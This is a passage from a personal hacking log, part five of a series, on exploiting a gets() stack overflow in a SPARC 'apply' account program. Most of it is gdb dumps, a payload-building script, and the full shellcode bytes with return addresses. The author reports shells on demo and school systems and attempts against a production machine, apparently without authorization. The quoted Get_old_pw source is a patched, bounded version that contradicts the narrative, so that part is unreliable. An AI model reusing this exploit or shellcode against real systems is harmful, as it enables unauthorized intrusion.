Hacking Apply – Pt. V

(gdb) 0x00012b2c in askyorn ()
(gdb) $ unknown mode: cooked
$ stty cooked
$ exit
(gdb) i r
g0             0x0      0
g1             0x6e     110
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0xffbef930       -4261584
o1             0xffbefd81       -4260479
o2             0x2919e  168350
o3             0x1      1
o4             0xff33c008       -13385720
o5             0x0      0
sp             0xffbef8c0       0xffbef8c0
o7             0x12a68  76392
l0             0x291a0  168352
l1             0x28d91  167313
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x81000000       -2130706432
l6             0x7efefeff       2130640639
l7             0x81010100       -2130640640
i0             0x0      0
i1             0x29190  168336
i2             0xff343a54       -13354412
i3             0x0      0
i4             0xff33c008       -13385720
i5             0x0      0
fp             0xffbefd40       0xffbefd40
i7             0x11630  71216
y              0x0      0
---Type <return> to continue, or q <return> to quit---
psr            0xfe401007       -29356025
wim            0x0      0
tbr            0x0      0
pc             0x12b2c  0x12b2c <askyorn+252>
npc            0x11638  0x11638 <Acct+376>
fsr            0x0      0
csr            0x0      0
(gdb) x/96x $sp
0xffbef8c0:     0x000291a0      0x00028d91      0xff000000      0x00ff0000
0xffbef8d0:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbef8e0:     0x00000000      0x00029190      0xff343a54      0x00000000
0xffbef8f0:     0xff33c008      0x00000000      0xffbefd40      0x00011630
0xffbef900:     0x00000000      0xff342fb0      0x00013da8      0x00000000
0xffbef910:     0x000292d1      0x00000024      0x00013da4      0x80000000
0xffbef920:     0x00000000      0x0000006e      0x00000000      0x00000000
0xffbef930:     0x6e6e6e6e      0x6e6e6e6e      0x110bd89a      0x9012216e
0xffbef940:     0xd023a054      0x110bdcda      0xd023a058      0x110b5a40
0xffbef950:     0xd023a05c      0xc023a060      0x9003a054      0xd023a048
0xffbef960:     0x9003a05c      0xd023a04c      0xc023a050      0x9003a054
0xffbef970:     0x9203a048      0x941b400d      0x8210203b      0x91d02008
0xffbef980:     0x901b400d      0x82102001      0x91d02008      0x41414141
0xffbef990:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9e0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa30:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) si
0x00011638 in Acct ()
                     (gdb) $ $
$ exit
(gdb) x/96x $sp
0xffbefd40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd70:     0x41414141      0x41414141      0xffbefe68      0xffbef930
0xffbefd80:     0x00000000      0x00013da8      0x00028d92      0x0002919e
0xffbefd90:     0x00000001      0xff33c008      0x00000000      0x00000000
0xffbefda0:     0x00000000      0x00000078      0x00000000      0xffbef9a9
0xffbefdb0:     0x00000001      0x00000001      0xff33f014      0xff320208
0xffbefdc0:     0xffbefdc8      0x0001135c      0xff33e5f0      0x00000000
0xffbefdd0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefde0:     0x00000000      0xff3de7a8      0x00000001      0xffbefebc
0xffbefdf0:     0xffbefec4      0x0002a6e4      0x00000000      0x00000000
0xffbefe00:     0xffbefe58      0x00010fec      0x00000000      0x00027ccc
0xffbefe10:     0xffbefe78      0x00000000      0x00000000      0x00000000
0xffbefe20:     0x00000000      0x00000000      0x00000003      0x00000000
0xffbefe30:     0x00000000      0x00000000      0x00000000      0xffffffff
0xffbefe40:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe50:     0xffbefe58      0x00010fac      0x00000001      0xffbefebc
0xffbefe60:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe70:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe80:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe90:     0x00000000      0x00000000      0x00000000      0x00000001
0xffbefea0:     0xffbefebc      0x00000000      0x00000000      0x00000000
0xffbefeb0:     0x00000000      0x00000000      0x00000001      0xffbeff50
(gdb) x/10i $pc
0x11638 <Acct+376>:     mov  %o0, %g1
0x1163c <Acct+380>:     cmp  %g1, 0
0x11640 <Acct+384>:     be  0x114f4 <Acct+52>
0x11644 <Acct+388>:     nop
0x11648 <Acct+392>:     call  0x1320c <quit>
0x1164c <Acct+396>:     nop
0x11650 <Acct+400>:     b  0x114f4 <Acct+52>
0x11654 <Acct+404>:     nop
0x11658 <Acct+408>:     sethi  %hi(0x28c00), %g1
0x1165c <Acct+412>:     or  %g1, 0x190, %g1     ! 0x28d90 <ibuf>
(gdb) i r
g0             0x0      0
g1             0x6e     110
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x0      0
o1             0x29190  168336
o2             0xff343a54       -13354412
o3             0x0      0
o4             0xff33c008       -13385720
o5             0x0      0
sp             0xffbefd40       0xffbefd40
o7             0x11630  71216
l0             0x41414141       1094795585
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0xffbefe68       0xffbefe68
i7             0xffbef930       -4261584
y              0x0      0
---Type <return> to continue, or q <return> to quit---
psr            0xfe401003       -29356029
wim            0x0      0
tbr            0x0      0
pc             0x11638  0x11638 <Acct+376>
npc            0x1163c  0x1163c <Acct+380>
fsr            0x0      0
csr            0x0      0
(gdb)

crucial address: right after the gets() in Acct:
0x11518

The exploit wasn’t working. The segfault was caused by something else: the register state was a mess.

(gdb)
0x11778 <Acct+696>:     srl  %g1, 3, %g1
0x1177c <Acct+700>:     and  %g1, 1, %g1
0x11780 <Acct+704>:     cmp  %g1, 0
0x11784 <Acct+708>:     bne  0x117c0 <Acct+768>
0x11788 <Acct+712>:     nop
0x1178c <Acct+716>:     add  %fp, -28, %o2
0x11790 <Acct+720>:     ld  [ %o2 ], %o5
0x11794 <Acct+724>:     add  %fp, -24, %o4
0x11798 <Acct+728>:     ld  [ %o4 ], %g1
0x1179c <Acct+732>:     ldub  [ %g1 ], %o3

Luckily, the only reg we need to restore to normal is %o3

0x11794 <Acct+724>:     add  %fp, -24, %o4
0x11798 <Acct+728>:     ld  [ %o4 ], %g1
0x1179c <Acct+732>:     ldub  [ %g1 ], %o3
0x117a0 <Acct+736>:     inc  %g1
0x117a4 <Acct+740>:     st  %g1, [ %o4 ]
0x117a8 <Acct+744>:     mov  %o5, %g1
0x117ac <Acct+748>:     stb  %o3, [ %g1 ]

must put a good value into %fp-24

(gdb) print/x $fp-24
$1 = 0xffbefdb0

we just need a stack offset in there : )
it’s a double indirect pointer
so we need to use 2 stack values
and we need to figure out the offset in the buffer where %fp-24 variable is…
I might not be able to work with this :(

Having to guarantee a correct double indirection is near impossible… so I am going to look elsewhere.
Already found a great place too: Groups()

Groups() comes after Acct()

Acct(&data);
Groups(&data);	/* offer choices from SETUP file */

...

Groups(datap)
struct info *datap;
{
int index, count=0;

    DBUG(HELLO,"** Groups()\n",NULL);
    blurb(Groups_inst1); gets(ibuf);
    show_params();
    for (index = 0; index < NPSETS; index++) datap->groups[index] = FREE;
    for (;;) {
      printf(GROUPS_PROMPT1);
      printf(GROUPS_PROMPT2, npsets);
      /* gets discards newline and null-terminates string */
      if ( (gets(ibuf)) == (char *)NULL ) {
        *(ibuf)   = 'x';	/* gets returns (char *)NULL on error or EOF */
	*(ibuf+1) = EOS;	/* We'll treat EOF as a 'quit'. */
      }
      else {
	if ( *ibuf == '\0' ) {	/* Empty line - no command */
          *(ibuf)   = 'p';	/* By default we'll print the menu */
	  *(ibuf+1) = EOS;
	}
      }
      switch (*ibuf) {
	case 'c':
		for (index = 0; index < NPSETS; index++)
		  datap->groups[index] = FREE;
		count=0;
		break;
	case 't':
		show_info(datap);
		break;
	case 'p':
		show_params();
		break;
	case 'q':
		if (count > 0)
		  return(SUCCESS);
		printf("You did not select any group or class.\n");
		/* FALL THROUGH */
	case 'x':
		/* Give applicant a chance to abandon the application */
		if (askyorn("Do you want to just forget the whole thing")) {
		  blurb(Groups_quit);
		  quit();
		  /* NOTREACHED */
		}
..
...

I can add a group..
hit ‘x’, buffer overflow, then ‘q’

set a break coming out of Groups()

disas Groups
...
0x0001233c <Groups+836>:        ret
0x00012340 <Groups+840>:        restore

THERE IS HOPE!!

(gdb) x/96x $sp
0xffbefc88:     0xff33fad9      0x00000000      0x00000006      0x00000000
0xffbefc98:     0x00000000      0x00000001      0x000291a0      0xff33c008
0xffbefca8:     0x00029190      0xff3439ec      0x00029190      0x000292d1
0xffbefcb8:     0x00000018      0x00015081      0xffbefce8      0xff3141fc
0xffbefcc8:     0xff343194      0x00000000      0xffbefd94      0x00000000
0xffbefcd8:     0x00000000      0x00000000      0x7efefeff      0x00000038
0xffbefce8:     0xff3439ec      0x00028d90      0xff000000      0x00ff0000
0xffbefcf8:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbefd08:     0x00028d90      0x00029190      0x0002919e      0xff343a54
0xffbefd18:     0xff33c008      0x00000000      0xffbefd48      0x000120a4
0xffbefd28:     0x000291c0      0x00029720      0x00000001      0x00000006
0xffbefd38:     0xffbefd40      0x00011698      0xffbef9a8      0x00028d90
0xffbefd48:     0xffbef9a8      0x00028d90      0x00000000      0x00000000
0xffbefd58:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd68:     0x00027ccc      0x00028d91      0x0002919e      0x00000001
0xffbefd78:     0xff33c008      0x00000003      0xffbefdc8      0x00011424
0xffbefd88:     0x00000007      0x00027ccc      0x00000006      0xff343a54
0xffbefd98:     0x00000000      0x00027cd8      0x00027cc0      0x00000031
0xffbefda8:     0xfffffff5      0x000284d5      0x00000004      0x00000003
0xffbefdb8:     0xff33f014      0xff320208      0xffbefdc8      0x0001135c
0xffbefdc8:     0xff33e5f0      0x00000000      0x00000000      0x00000000
0xffbefdd8:     0x00000000      0x00000000      0x00000000      0xff3de7a8
0xffbefde8:     0x00000001      0xffbefebc      0xffbefec4      0x0002a6e4
0xffbefdf8:     0x00000000      0x00000000      0xffbefe58      0x00010fec

looks for the 00000004 that is our target must write with 0x01
here is where our buffer began:

0xffbef938:     0x6e414141      0x41414141      0x41414141      0x41414141
0xffbef948:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef958:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef968:     0x41414141      0x41414141      0x41009

MONEY
right at the beginning of apply execution, there is a call to this function:

switch (action = Get_old_pw(&data)) {

in that function is a call to my favorite vulnerable function, askyorn()

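/*
 * read_login - bounded stand-in for gets(): reads one line from stdin into
 * buf (at most len-1 characters), strips the trailing newline, NUL-terminates
 * and, if the line was longer than the buffer, discards the remainder so it
 * is not consumed by the next prompt.  Returns buf, or (char *)NULL on EOF or
 * read error before anything was stored, matching the gets() contract.
 */
static char *
read_login(buf, len)
char *buf;
unsigned int len;
{
    char *nl;
    int ch;

    if (len == 0 || fgets(buf, (int)len, stdin) == (char *)NULL)
	return((char *)NULL);
    if ( (nl = strchr(buf, '\n')) != (char *)NULL )
	*nl = '\0';
    else
	while ( (ch = getc(stdin)) != EOF && ch != '\n' )
	    ;			/* drain the over-long tail of the line */
    return(buf);
}

/*
 * Get_old_pw - ask whether the applicant already has an account; if so, read
 * the login name and check the typed password against the passwd database.
 *
 * Returns CREATE   when there is no existing account to re-use,
 *         RECREATE when the name is unknown but the applicant keeps it,
 *         MODIFY   when the password matched and datap->pass / datap->name
 *                  were filled from the passwd entry.
 * After NTRIES failed attempts it calls fatal(), which is not expected to
 * return (nothing follows the call).
 *
 * The login name used to be read with gets(), which cannot bound the input
 * and lets a long line overrun datap->login; it is now read through
 * read_login() with the buffer's size.
 */
Get_old_pw(datap)
struct info *datap;
{
struct passwd *pw;
int try;
char *typed;

    DBUG(HELLO,"** Get_old_pw()\n",NULL);
    if (askyorn("Do you already have an account with us")) {
	printf("Please enter your login name: ");
	/*
	 * NOTE(review): assumes datap->login is a char array member of
	 * struct info so that sizeof yields its capacity -- confirm against
	 * the struct definition; if it is a pointer, pass the real length.
	 */
	if ( read_login(datap->login, sizeof(datap->login)) == (char *)NULL )
	    *(datap->login) = '\0';	/* EOF: treat as an empty login name */
	/*
	 *   always setpwent() to rewind, since previous getpw*'s
	 *   leave the file pointer in an indeterminate state.
	 */
	setpwent();
	if ( (pw=getpwnam(datap->login)) == NULL ) {
	    printf("Account for %s not found in database.\n",datap->login);
	    printf("Your account will have to be recreated.\n");
	    if (askyorn("Do you want to re-use that login name")) {
		printf("OK.  Re-using %s in this application.\n",datap->login);
		return(RECREATE);
	    }
	    else
		return(CREATE);
	}
	else {	/* verify user's identity */
	    /*
	     * NOTE(review): on systems that keep hashes in a shadow file,
	     * pw_passwd is only a placeholder and this comparison can never
	     * succeed -- confirm how the deployment stores passwords.
	     */
	    for (try=0; try<NTRIES; try++, printf("\nNope.  Try again.\n")) {
		typed = getpass(PROMPT);	/* NULL on EOF/error: counts as a miss */
		if (typed != (char *)NULL &&
		    EQUAL(pw->pw_passwd, crypt(typed,pw->pw_passwd))) {
			strncpy(datap->pass,pw->pw_passwd,SBUF);
			datap->pass[SBUF-1] = '\0';	/* strncpy leaves no NUL when it truncates */
			strncpy(datap->name,pw->pw_gecos,SBUF);
			datap->name[SBUF-1] = '\0';
			return(MODIFY);
		}
	    }
	    printf("No match in %d tries.", try);
	    printf("  Your password must be reset.\n");
	    fatal("Please see the operator or System Administrator.");
	}
    }
    else
	return(CREATE);
}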

This is EXACTLY the kind of behavior I want — fill the buffer and return, return without doing anything! <3 At this point, I have successfully exploited a locally run GDB version of the program. What's next is to produce a NOP-SLED with slicing capabilities. Step one is to figure out the max size of the SLIDE. Earlier I had this:

1092 + ‘nnnn’ = 1096

# asmshell5_interactive.bin is 84 bytes
perl -e ‘print “nnnnnnnn”;’
cat asmshell5_interactive.bin
# 92 bytes so far
# 1096 – 92 = 1004
perl -e ‘print “A”x1004′
printf “\xff\xbe\xfe\x68″
printf “\xff\xbe\xf9\x30″ # code will start at 0xffbef938
# return address goes here

I would like to turn this into C:
1004 / 4 = 251 NOPs

"nnnnnnnn"
251 NOPS
shellcode
fp
retaddr

but i just prefer using bash for hits

bazz@life[pts/2][~/latest] cat build_apply_sc2
# asmshell5_interactive.bin is 84 bytes
perl -e 'print "nnnnnnnn";'
cat asmshell5_interactive.bin
# 92 bytes so far
# 1096 - 92 = 1004
perl -e 'print "\x01"x1004'
printf "\xff\xbe\xfe\x68"
printf "\xff\xbe\xf9\x30" # code will start at 0xffbef938
# return address goes here
bazz@life[pts/2][~/latest] ./build_apply_sc2 > /tmp/B
bazz@life[pts/2][~/latest] od -t x1 -A d /tmp/B
0000000 6e 6e 6e 6e 6e 6e 6e 6e 11 0b d8 9a 90 12 21 6e
0000016 d0 23 a0 54 11 0b dc da d0 23 a0 58 11 0b 5a 40
0000032 d0 23 a0 5c c0 23 a0 60 90 03 a0 54 d0 23 a0 48
0000048 90 03 a0 5c d0 23 a0 4c c0 23 a0 50 90 03 a0 54
0000064 92 03 a0 48 94 1b 40 0d 82 10 20 3b 91 d0 20 08
0000080 90 1b 40 0d 82 10 20 01 91 d0 20 08 01 01 01 01
0000096 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
*
0001088 01 01 01 01 01 01 01 01 ff be fe 68 ff be f9 30
0001104
bazz@life[pts/2][~/latest] od2sc /tmp/B
"\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x11\x0b\xd8\x9a\x90\x12\x21\x6e"
"\xd0\x23\xa0\x54\x11\x0b\xdc\xda\xd0\x23\xa0\x58\x11\x0b\x5a\x40"
"\xd0\x23\xa0\x5c\xc0\x23\xa0\x60\x90\x03\xa0\x54\xd0\x23\xa0\x48"
"\x90\x03\xa0\x5c\xd0\x23\xa0\x4c\xc0\x23\xa0\x50\x90\x03\xa0\x54"
"\x92\x03\xa0\x48\x94\x1b\x40\x0d\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\x40\x0d\x82\x10\x20\x01\x91\xd0\x20\x08\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\xff\xbe\xfe\x68\xff\xbe\xf9\x30"

looking good. Let’s get it into C. The only offsets I’ll be changing are 1100,1101,1102,1103 for the return address. We need smart PTY “signal handling”. I use CTRL-V to print out a raw ctrl character to grab its hex code:

 
bazz@life[pts/2][~/latest] printf "^S" | od -t x1
0000000 13
0000001

CTRL-S will adjust the return address based on a slicing algorithm I’ve yet to create, and CTRL-D as always, sends the payload without a carriage return. CR is manually inserted with CTRL-J.

made sure I was doing things correctly:

#include <stdint.h>
#include <stdio.h>
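/*
 * Sanity check for splitting a 32-bit value into its four bytes, MSB first.
 *
 * Each byte is held in an unsigned char: with a plain (signed) char, any
 * byte >= 0x80 would be sign-extended when promoted for printf and print as
 * ffffffXX instead of XX.  %02x keeps every byte two hex digits wide.
 */
int main(void)
{
  uint32_t calc_RA = 0x12345678; /* sample 32-bit value to split (constructed) */
  unsigned char c;

  c = (calc_RA >> 24) & 0xff;
  printf("MSB = %02x\n", c);

  c = (calc_RA >> 16) & 0xff;
  printf("byte 3 = %02x\n", c);

  c = (calc_RA >> 8) & 0xff;
  printf("byte 2 = %02x\n", c);

  c = calc_RA & 0xff;
  printf("LSB = %02x\n", c);

  return 0;
}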

it’s useful to know the return address of Get_old_pw: 0x00011a58

NOP SLIDE RANGE IS FROM 0xffbef940 -> 0xffbefd2C

I am now at the point where I can get a shell on my own remote demo system,
I can get a shell by invoking the application on a remote system at school,
but not on the actual production machine… I wonder….
Could they be using ASLR??? Is the stack at a different location?? My best guess is that it’s running in 64-bit mode, which is unlikely…
7FFFC000-7FFFFFFF is the stack space, 16KB, 16384 bytes.
middle is 7FFFE000
The shell code is the same for the 64-bit version…

Well, I just tried all of the 64-bit stack space… that didn’t work. I did skip one offset — to hell with it.

Since I have no idea what to do, I’m just like -.- what else can I find on blade60?? HM i dunno let’s try this:

grep -r -i "blade60" / 2>/dev/null > anything_blade60_related # 

TO BE CONTINUED
